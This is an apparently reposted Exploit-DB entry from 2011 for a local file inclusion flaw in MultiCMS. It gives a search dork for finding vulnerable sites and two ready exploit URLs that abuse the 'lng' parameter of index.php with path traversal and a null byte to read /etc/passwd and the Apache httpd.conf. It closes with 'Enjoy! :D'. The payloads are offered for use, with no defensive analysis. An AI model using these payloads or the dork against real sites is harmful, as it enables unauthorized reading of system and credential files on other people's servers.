ad

MultiCMS Local File Inclusion Vulnerbility



EDB-ID: 16074 CVE: N/A OSVDB-ID: N/A
Author: R3VAN_BASTARD Published: 2011-01-29 Verified: Verified
Exploit Code:   Download Vulnerable App:   N/A

Rating

(0.0)
Prev Home Next
Source: http://packetstormsecurity.org/files/view/97987/multicms-lfi.txt

=============================www[dot]Whiteponny[dot]com=============================
# Date: 29/01/2011
# Author: R3VAN_BASTARD
# Exploit Title: MultiCMS File Inclusion Vulnerbility
# Vendor: http://www.multicms.net
# Status: FIXED
# Tested on: Windows 7
# Dork: "Redakcní systém MultiCMS"
# Mail: defrontliner@whiteponny.com
================================================================================
# File: /Index.php?lng=[LFI]
# XPL: http://Localhost.com/[path]/index.php?lng=../../../../../../../../../../../../../../../etc/passwd%00
           http://Localhost.com/[path]/index.php?lng=../../../../../../../../../../../../../../../etc/httpd/conf/httpd.conf%00 

Enjoy! :D
================================================================================
Thanks To: Madonk "Makasih udah nemenin Scan :D"
                 S3T4N a.k.a Zeth.
                 All My Friends
=============================www[dot]Whiteponny[dot]com=============================